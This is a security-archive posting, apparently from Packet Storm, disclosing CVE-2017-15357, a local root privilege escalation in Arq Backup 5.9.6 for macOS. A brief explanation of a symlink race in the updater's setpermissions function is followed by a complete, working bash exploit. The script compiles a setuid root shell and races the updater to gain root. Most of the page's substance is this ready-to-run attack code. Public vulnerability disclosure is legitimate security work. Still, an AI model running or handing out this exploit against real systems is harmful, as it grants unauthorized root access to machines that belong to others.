Exploit the possiblities

Arq Backup 5.9.6 Local Root Privilege Escalation

Arq Backup 5.9.6 Local Root Privilege Escalation
Posted Dec 4, 2017
Authored by Mark Wadham

Arq Backup versions 5.9.6 and below suffer from a local root privilege escalation vulnerability.

tags | exploit, local, root
advisories | CVE-2017-15357
MD5 | 2cf34b399d49d64d0321379e8239a52e

Arq Backup 5.9.6 Local Root Privilege Escalation

Change Mirror Download
Arq Backup from Haystack Software is a great application for backing up macs and
windows machines. Unfortunately versions of Arq for mac before 5.9.7 are
vulnerable to a local root privilege escalation exploit.

The updater binary has a "setpermissions" function which sets the suid bit and
root ownership on itself but it suffers from a race condition that allows you to
swap the destination for these privileges using a symlink.

We can exploit this to get +s and root ownership on any arbitrary binary.

Other binaries in the application also suffer from the same issue.

This was fixed in Arq 5.9.7.

https://m4.rkw.io/arq_5.9.6.sh.txt
49cc82df33a3e23245c7a1659cc74c0e554d5fdbe2547ac14e838338e823956d
------------------------------------------------------------------------------
#!/bin/bash

##################################################################
###### Arq <= 5.9.6 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ####
##################################################################

vuln=`ls -la /Applications/Arq.app/Contents/Library/LoginItems/\
Arq\ Agent.app/Contents/Resources/arq_updater |grep 'rwsr-xr-x' \
|grep root`

cwd="`pwd`"

if [ "$vuln" == "" ] ; then
echo "Not vulnerable - auto-updates not enabled."
exit 1
fi

cat > arq_596_exp.c <<EOF
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl(
"/bin/bash","bash","-c","rm -f $cwd/arq_updater;/bin/bash",
NULL
);
return 0;
}
EOF

gcc -o arq_596_exp arq_596_exp.c
rm -f arq_596_exp.c

ln -s /Applications/Arq.app/Contents/Library/LoginItems/\
Arq\ Agent.app/Contents/Resources/arq_updater

./arq_updater setpermissions &>/dev/null&
rm -f ./arq_updater
mv arq_596_exp ./arq_updater

i=0
timeout=10

while :
do
r=`ls -la ./arq_updater |grep root`
if [ "$r" != "" ] ; then
break
fi
sleep 0.1
i=$((i+1))
if [ $i -eq $timeout ] ; then
rm -f ./arq_updater
echo "Not vulnerable"
exit 1
fi
done

./arq_updater

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    8 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close